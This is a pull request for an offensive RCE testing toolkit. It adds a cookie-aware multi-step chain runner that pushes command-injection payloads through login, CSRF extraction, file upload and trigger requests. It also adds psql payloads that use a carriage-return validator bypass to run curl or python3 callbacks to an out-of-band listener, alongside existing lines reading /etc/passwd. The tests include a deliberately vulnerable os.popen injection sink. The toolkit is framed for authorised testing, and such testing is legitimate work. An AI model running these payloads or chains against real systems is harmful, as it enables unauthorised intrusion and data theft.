### PR TITLE
Add a session-aware multi-step verification chain (--verify-chain)

### DIFF
--- a/README.md
+++ b/README.md
@@ -1,6 +1,6 @@
 # RCEKit — RCE Testing Toolkit
 
-**Version 2.8.0** · MIT · Python 3.8+ · no third-party dependencies
+**Version 2.9.0** · MIT · Python 3.8+ · no third-party dependencies
 
 RCEKit is an offensive **RCE testing toolkit** for authorised penetration
 testing, red teaming, and security research. It covers the full loop, not just
@@ -93,6 +93,7 @@ nothing. Run `python rcekit.py --doctor` to check corpus integrity.
 | `--verify-delay` / `--verify-timeout` | Seconds between requests / per-request timeout | `0` / `8` |
 | `--verify-active-risk` | Highest safety tier `--verify-url` may fire (`safe`/`intrusive`/`stateful`) | `safe` |
 | `--verify-allow-destructive` | Let verification fire destructive payloads (persistence/backdoors); skipped by default | Off |
+| `--verify-chain <profile.json>` | Deliver each payload through a multi-step, session-aware flow (login/CSRF → prerequisites → payload delivery → trigger) and confirm in-band or out-of-band | None |
 | `--listen` + `--correlate <map.jsonl>` | Run the OOB listener and map callbacks to payloads | Off |
 | `--listen-http-port` / `--listen-dns-port` / `--listen-answer-ip` / `--listen-log` | Listener HTTP/DNS ports, DNS answer IP, hit log | `8080` / `5335` / `127.0.0.1` / — |
 | **Targeting** | | |
@@ -295,6 +296,42 @@ sent but confirmed out-of-band (see below). **Destructive payloads (persistence,
 backdoors, security-control tampering) are never fired at the target unless you
 pass `--verify-allow-destructive`.** Requires `--acknowledge-consent`; every run
 is audited to `exploit_audit.log`.
+
+## Multi-step / Session-aware Verification
+
+A single `--verify-url` request cannot reach sinks that sit behind authentication,
+carry the injection in **uploaded file content**, or execute **blind/async**.
+`--verify-chain <profile.json>` drives an ordered, cookie-aware request chain
+(login → CSRF extraction → prerequisite requests → payload delivery → trigger) and
+confirms execution either **in-band** (the payload's `match` oracle against a chosen
+step's response) or **out-of-band** (a `{callback}` URL received by the built-in
+listener).
+
+Each step is `method` + `path` (+ optional `headers`) with one body of `body`
+(raw), `json` (string), `form` (object) or `multipart`
+(`{"fields": {...}, "file": {"field","filename","content"}}`). `FUZZ` marks where
+the payload lands (including inside uploaded file content); `{var}` is substituted
+from earlier steps' `extract` (`{var: regex-with-one-capture-group}`), and `{token}`
+is a per-payload unique value (e.g. for a unique upload filename).
+
+```json
+{
+  "base": "https://target.example",
+  "callback_host": "10.0.0.5", "listen_port": 8877,
+  "confirm_step": "trigger",
+  "steps": [
+    {"name": "csrf",  "method": "GET",  "path": "/login", "extract": {"csrf": "csrf_token\" value=\"([^\"]+)"}},
+    {"name": "login", "method": "POST", "path": "/login", "form": {"csrf": "{csrf}", "user": "u", "pass": "p"}},
+    {"name": "upload","method": "POST", "path": "/import", "multipart": {"file": {"field": "f", "filename": "x_{token}.sql", "content": "FUZZ"}}},
+    {"name": "trigger","method": "POST","path": "/import/run", "json": "{\"file\": \"x_{token}.sql\"}"}
+  ]
+}
+```
+
+```bash
+python rcekit.py --acknowledge-consent --environments postgres --categories code_execution \
+  --contexts raw --encodings none --verify-active-risk intrusive --verify-chain chain.json
+```
 
 ## Out-of-Band Listener
 

--- a/rcekit.py
+++ b/rcekit.py
@@ -26,7 +26,7 @@ logger = logging.getLogger(__name__)
 
 # Bump on every change: PATCH for fixes, MINOR for new capabilities, MAJOR for
 # breaking changes to the CLI, output formats, or template schema.
-__version__ = "2.8.0"
+__version__ = "2.9.0"
 
 SAFETY_ORDER = {"safe": 0, "intrusive": 1, "stateful": 2}
 
@@ -1591,6 +1591,150 @@ class RCEKit:
                 break
         return results
 
+    def run_verification_chain(self, records: Iterator[PayloadRecord], chain: Dict[str, Any],
+                               delay: float = 0.0, timeout: float = 20.0,
+                               max_payloads: Optional[int] = None) -> List[Dict[str, Any]]:
+        """Deliver each payload through a multi-step, session-aware request chain
+        (login -> CSRF extraction -> prerequisite requests -> payload delivery ->
+        trigger), then confirm execution either in-band (the payload's ``match``
+        oracle against a chosen step's response) or out-of-band (a ``{callback}``
+        URL received by RCEKit's own OOB listener). This reaches sinks that a
+        single stateless request cannot: authenticated flows, injection carried in
+        uploaded file content, and blind/async execution.
+
+        ``chain`` keys: ``base`` (URL prefix), ``steps`` (ordered list),
+        ``confirm_step`` (name/index whose response is matched; default last),
+        ``callback_host`` and ``listen_port`` (OOB listener the target calls back
+        to). Each step: ``method``, ``path``, optional ``headers``, and one body of
+        ``body`` (raw), ``json`` (string), ``form`` (dict) or ``multipart``
+        (``{"fields": {...}, "file": {"field","filename","content"}}``). ``FUZZ``
+        anywhere in a step's body/content is where the payload lands; ``{var}`` is
+        substituted from earlier steps' ``extract`` ({var: regex-with-one-group}).
+        """
+        import time, os, json as _json, http.cookiejar, urllib.request, urllib.parse
+
+        base = chain.get("base", "").rstrip("/")
+        steps = chain["steps"]
+        confirm_key = chain.get("confirm_step")
+        callback_host = chain.get("callback_host")
+        listen_port = int(chain.get("listen_port", 0) or 0)
+
+        listener = None
+        if listen_port:
+            listener = OOBListener()
+            listener.start_http(listen_port)
+            logger.info("Chain OOB listener on port %s", listen_port)
+
+        def subst(text: str, ctx: Dict[str, str]) -> str:
+            for key, val in ctx.items():
+                text = text.replace("{" + key + "}", val)
+            return text
+
+        def run_steps(payload: str, token: str) -> Tuple[Dict[str, str], str]:
+            cj = http.cookiejar.CookieJar()
+            opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
+            # Seed the token so a profile can give each payload a unique filename /
+            # path ({token}) — essential when delivery writes to a shared location
+            # and an async trigger would otherwise read another payload's content.
+            ctx: Dict[str, str] = {"token": token}
+            if listener is not None and callback_host:
+                cb = f"http://{callback_host}:{listen_port}/{token}"
+                payload = payload.replace("{callback}", cb)
+                listener.tokens[token] = {"payload": payload, "category": "chain", "context": "chain"}
+            confirm_body = ""
+            for idx, step in enumerate(steps):
+                path = subst(step["path"], ctx)
+                url = path if path.startswith("http") else base + path
+                headers = {k: subst(v, ctx).replace("FUZZ", payload)
+                           for k, v in (step.get("headers") or {}).items()}
+                data = None
+                if "multipart" in step:
+                    mp = step["multipart"]
+                    boundary = "----rcekitChain"
+                    parts = []
+                    for fname, fval in (mp.get("fields") or {}).items():
+                        parts.append(f"--{boundary}\r\nContent-Disposition: form-data; name=\"{fname}\"\r\n\r\n"
+                                     f"{subst(str(fval), ctx).replace('FUZZ', payload)}\r\n")
+                    fl = mp.get("file")
+                    body = "".join(parts).encode()
+                    if fl:
+                        content = subst(str(fl.get("content", "")), ctx).replace("FUZZ", payload)
+                        filename = subst(str(fl.get("filename", "file")), ctx).replace("FUZZ", payload)
+                        body += (f"--{boundary}\r\nContent-Disposition: form-data; name=\"{fl['field']}\"; "
+                                 f"filename=\"{filename}\"\r\n"
+                                 f"Content-Type: application/octet-stream\r\n\r\n").encode() + content.encode()
+                    body += f"\r\n--{boundary}--\r\n".encode()
+                    data = body
+                    headers["Content-Type"] = f"multipart/form-data; boundary={boundary}"
+                elif "json" in step:
+                    data = subst(step["json"], ctx).replace("FUZZ", payload).encode()
+                    headers.setdefault("Content-Type", "application/json")
+                elif "form" in step:
+                    form = {k: subst(str(v), ctx).replace("FUZZ", payload) for k, v in step["form"].items()}
+                    data = urllib.parse.urlencode(form).encode()
+                    headers.setdefault("Content-Type", "application/x-www-form-urlencoded")
+                elif "body" in step:
+                    data = subst(step["body"], ctx).replace("FUZZ", payload).encode()
+                req = urllib.request.Request(url, data=data, headers=headers,
+                                             method=step.get("method", "GET" if data is None else "POST"))
+                try:
+                    with opener.open(req, timeout=timeout) as resp:
+                        text = resp.read().decode(errors="replace")
+                except urllib.error.HTTPError as exc:
+                    text = exc.read().decode(errors="replace")
+                except Exception as exc:
+                    text = str(exc)
+                for var, rgx in (step.get("extract") or {}).items():
+                    m = re.search(rgx, text)
+                    if m:
+                        ctx[var] = m.group(1)
+                if confirm_key in (step.get("name"), idx) or (confirm_key is None and idx == len(steps) - 1):
+                    confirm_body = text
+            return ctx, confirm_body
+
+        results: List[Dict[str, Any]] = []
+        seen: Set[str] = set()
+        pending_oob: List[Dict[str, Any]] = []
+        for record in records:
+            if record.payload in seen:
+                continue
+            seen.add(record.payload)
+            token = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(12))
+            _, confirm_body = run_steps(record.payload, token)
+            is_oob = "{callback}" in record.payload
+            if is_oob:
+                pending_oob.append({"record": record, "token": token})
+                verdict, detail = "oob-pending", f"awaiting callback token {token}"
+            elif record.match and self._encoded_search(record.match, confirm_body):
+                verdict, detail = "confirmed", f"matched /{record.match}/"
+            elif record.match:
+                verdict, detail = "no-match", ""
+            else:
+                verdict, detail = "no-signature", "no in-band oracle; deliver as OOB to confirm"
+            results.append({"verdict": verdict, "detail": detail, "payload": record.payload,
+                            "category": record.category, "context": record.context, "token": token})
+            if delay:
+                time.sleep(delay)
+            if max_payloads and len(results) >= max_payloads:
+                break
+
+        # Give blind/async callbacks a moment to arrive, then resolve OOB verdicts.
+        if pending_oob and listener is not None:
+            deadline = time.time() + 6
+            while time.time() < deadline:
+                hit_tokens = {h.get("token") for h in listener.hits}
+                if all(p["token"] in hit_tokens for p in pending_oob):
+                    break
+                time.sleep(0.5)
+            hit_tokens = {h.get("token") for h in listener.hits}
+            for result in results:
+                if result["token"] in hit_tokens and result["verdict"] == "oob-pending":
+                    result["verdict"] = "confirmed"
+                    result["detail"] = f"OOB callback received for token {result['token']}"
+                elif result["verdict"] == "oob-pending":
+                    result["detail"] = f"no callback received for token {result['token']}"
+        return results
+
     def log_exploitation_usage(self, watermark_token: str, arguments: argparse.Namespace) -> None:
         audit_path = Path("exploit_audit.log")
         try:
@@ -1855,6 +1999,11 @@ def main():
                              "back reverse shells, download-execute, credential access, lateral movement, "
                              "container escape, cloud-metadata and OOB payloads; pass 'intrusive' to include "
                              "them. Independent of --max-safety, which only governs file output")
+    parser.add_argument("--verify-chain", default=None,
+                        help="Path to a JSON chain profile: deliver each payload through a multi-step, "
+                             "session-aware flow (login/CSRF -> prerequisites -> payload delivery -> trigger) "
+                             "and confirm in-band (match oracle) or out-of-band (a {callback} URL to the "
+                             "built-in listener). Reaches authenticated, file-content and blind/async sinks.")
     parser.add_argument("--doctor", action="store_true",
                         help="Run a corpus integrity check (template found, parses, payload counts) and exit non-zero if it is missing or empty")
     parser.add_argument("--listen", action="store_true",
@@ -2007,6 +2156,42 @@ def main():
         max_safety = "intrusive"
         if not oob_domain:
             oob_domain = "oob.interact.sh"
+
+    if args.verify_chain:
+        if not args.acknowledge_consent:
+            print("[!] --verify-chain actively sends payloads to the target. Re-run with "
+                  "--acknowledge-consent to confirm you are authorised to test it.")
+            return
+        with open(args.verify_chain, "r", encoding="utf-8") as chain_file:
+            chain = json.load(chain_file)
+        verify_max_safety = args.verify_active_risk or "safe"
+        records = generator.generate_payload_records(
+            selected_contexts=selected_contexts, selected_categories=selected_categories,
+            selected_encodings=selected_encodings, selected_environments=selected_environments,
+            mode=mode, watermark_token=watermark_token, max_safety=verify_max_safety,
+            include_blocking=include_blocking, oob_domain=oob_domain,
+        )
+        records = list(records)
+        verify_token = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))
+        generator.log_exploitation_usage(f"VERIFY-CHAIN:{verify_token} base={chain.get('base')}", args)
+        print(f"[verify-chain] {chain.get('base')}  ({len(chain.get('steps', []))} steps, "
+              f"{len(records)} payloads)  (authorised target)")
+        results = generator.run_verification_chain(
+            records, chain, delay=args.verify_delay, timeout=args.verify_timeout,
+            max_payloads=args.max_payloads)
+        by_verdict: Dict[str, int] = {}
+        for result in results:
+            by_verdict[result["verdict"]] = by_verdict.get(result["verdict"], 0) + 1
+        confirmed = [r for r in results if r["verdict"] == "confirmed"]
+        print(f"[verify-chain] sent {len(results)} unique payloads: " +
+              ", ".join(f"{v}={c}" for v, c in sorted(by_verdict.items())))
+        if confirmed:
+            print(f"\n[verify-chain] CONFIRMED execution ({len(confirmed)}):")
+            for result in confirmed:
+                print(f"  [{result['category']}] {result['payload']!r}   ({result['detail']})")
+        else:
+            print("\n[verify-chain] No execution confirmed.")
+        return
 
     if args.verify_url:
         if not args.acknowledge_consent:

--- a/templates/payloads.json
+++ b/templates/payloads.json
@@ -149,7 +149,9 @@
                     "SELECT 1;\n\\! cat /etc/passwd\n",
                     {"payload": "SELECT 1;\r\\! id\r", "notes": ["CR (\\r) separates the meta-command so a newline-based validator (e.g. pgAdmin CVE-2025-13780) does not detect the \\! line"]},
                     {"payload": "SELECT 1;\r\\! cat /etc/passwd\r", "notes": ["CR (\\r) meta-command bypass; psql still executes \\! after splitting on CR"]},
-                    {"payload": "SELECT 1;\r\\! bash -c 'id > /tmp/rcekit_{canary}'\r", "expected_channel": "response", "notes": ["blind sink: confirm out-of-band or via the written marker rather than the HTTP response"]}
+                    {"payload": "SELECT 1;\r\\! bash -c 'id > /tmp/rcekit_{canary}'\r", "expected_channel": "response", "notes": ["blind sink: confirm out-of-band or via the written marker rather than the HTTP response"]},
+                    {"payload": "SELECT 1;\r\\! curl -s {callback}\r", "notes": ["blind async sink: {callback} is filled by the chain runner with the OOB listener URL; confirmation is the received callback, not the HTTP response"]},
+                    {"payload": "SELECT 1;\r\\! python3 -c 'import urllib.request;urllib.request.urlopen(\"{callback}\")'\r", "notes": ["blind async sink, curl-free OOB callback via python3; confirmed by the received callback"]}
                 ]
             },
             "php": {

--- a/tests/test_generator.py
+++ b/tests/test_generator.py
@@ -1360,5 +1360,110 @@ class EncodedOracleTestCase(unittest.TestCase):
         self.assertFalse(self.gen._encoded_search(r"uid=\d+", "welcome — 49 documents processed"))
 
 
+class VerifyChainTestCase(unittest.TestCase):
+    """O2: the session-aware multi-step chain runner reaches sinks a single
+    stateless request cannot — confirming in-band (match oracle) and out-of-band
+    (a {callback} URL received by the built-in listener)."""
+
+    def setUp(self):
+        self.gen = RCEKit()
+
+    @staticmethod
+    def _free_port():
+        import socket
+        s = socket.socket()
+        s.bind(("127.0.0.1", 0))
+        port = s.getsockname()[1]
+        s.close()
+        return port
+
+    def test_chain_confirms_in_band_via_multi_step_flow(self):
+        import http.server, socketserver, threading, re as _re, urllib.parse as up
+
+        class Handler(http.server.BaseHTTPRequestHandler):
+            def log_message(self, *a):
+                pass
+
+            def do_GET(self):  # token page whose value a later step must reuse
+                self.send_response(200); self.end_headers()
+                self.wfile.write(b"session TOKEN=abc123 ready")
+
+            def do_POST(self):
+                length = int(self.headers.get("Content-Length", 0))
+                body = self.rfile.read(length).decode()
+                cmd = up.parse_qs(body).get("cmd", [""])[0]
+                pipe = os.popen("echo " + cmd + " 2>&1")  # command injection sink
+                out = pipe.read(); pipe.close()
+                self.send_response(200); self.end_headers()
+                try:
+                    self.wfile.write(out.encode(errors="replace"))
+                except BrokenPipeError:
+                    pass
+
+        server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), Handler)
+        port = server.server_address[1]
+        threading.Thread(target=server.serve_forever, daemon=True).start()
+        try:
+            chain = {
+                "base": f"http://127.0.0.1:{port}",
+                "confirm_step": "run",
+                "steps": [
+                    {"name": "tok", "method": "GET", "path": "/session",
+                     "extract": {"tok": r"TOKEN=(\w+)"}},
+                    {"name": "run", "method": "POST", "path": "/run",
+                     "form": {"session": "{tok}", "cmd": "FUZZ"}},
+                ],
+            }
+            records = list(self.gen.generate_payload_records(
+                selected_categories=["basic_enum"], selected_environments=["unix"],
+                selected_contexts=["raw"], selected_encodings=["none"]))
+            results = self.gen.run_verification_chain(records, chain)
+            confirmed = [r for r in results if r["verdict"] == "confirmed"]
+            self.assertTrue(confirmed, "the chain must confirm at least one RCE")
+            self.assertTrue(any(r["payload"] == "; id" for r in confirmed))
+        finally:
+            server.shutdown(); server.server_close()
+
+    def test_chain_confirms_out_of_band_via_builtin_listener(self):
+        import http.server, socketserver, threading, re as _re, urllib.request
+
+        class Handler(http.server.BaseHTTPRequestHandler):
+            def log_message(self, *a):
+                pass
+
+            def do_POST(self):
+                length = int(self.headers.get("Content-Length", 0))
+                body = self.rfile.read(length).decode()
+                # Simulate blind execution: the "command" fetches the callback URL.
+                m = _re.search(r"https?://\S+", body)
+                if m:
+                    try:
+                        urllib.request.urlopen(m.group(0).strip("'\""), timeout=3).read()
+                    except Exception:
+                        pass
+                self.send_response(200); self.end_headers(); self.wfile.write(b"queued")
+
+        server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), Handler)
+        port = server.server_address[1]
+        threading.Thread(target=server.serve_forever, daemon=True).start()
+        listen_port = self._free_port()
+        try:
+            chain = {
+                "base": f"http://127.0.0.1:{port}",
+                "callback_host": "127.0.0.1",
+                "listen_port": listen_port,
+                "steps": [
+                    {"name": "exec", "method": "POST", "path": "/exec", "body": "cmd=FUZZ"},
+                ],
+            }
+            rec = make_record(payload="run {callback}", category="oob",
+                              expected_channel="response", match=None)
+            results = self.gen.run_verification_chain([rec], chain)
+            self.assertEqual(results[0]["verdict"], "confirmed")
+            self.assertIn("callback", results[0]["detail"])
+        finally:
+            server.shutdown(); server.server_close()
+
+
 if __name__ == "__main__":
     unittest.main()


### PR DESCRIPTION
## Summary

Adds a multi-step, session-aware verification mode that reaches sinks a single stateless `--verify-url` request cannot: authenticated flows, injection carried in uploaded **file content**, and **blind/async** execution.

**Stacked on `feat/detection-coverage`** — review/merge that PR first; this one is diffed against it so it shows only the chain changes.

## Changes

- **`run_verification_chain` / `--verify-chain <profile.json>`** — a cookie-aware runner that executes an ordered request chain (login → CSRF/variable extraction → prerequisite requests → payload delivery → trigger) and confirms execution **in-band** (the payload's `match` oracle against a chosen step's response) or **out-of-band** (a `{callback}` URL received by the built-in listener).
  - Each step is `method` + `path` (+ optional `headers`) with one body of `body` (raw), `json` (string), `form` (object) or `multipart` (`{"fields": {...}, "file": {"field","filename","content"}}`).
  - `FUZZ` marks where the payload lands (including inside uploaded file content); `{var}` is substituted from earlier steps' `extract` (`{var: regex-with-one-capture-group}`); `{token}` gives each payload a unique value (e.g. a unique upload filename, so an async trigger reads the right content).
- Adds curl / python3 `{callback}` psql payloads for the out-of-band confirmation path.

## Tests

- `--verify-chain` confirms both in-band (a multi-step flow against a local command-injection sink) and out-of-band (via the built-in listener).
- Full suite: **90/90 green**, offline, no third-party dependencies.

## Versioning

Bumped `2.8.0` → `2.9.0` (new capability) and updated the README (`--verify-chain` section and option).
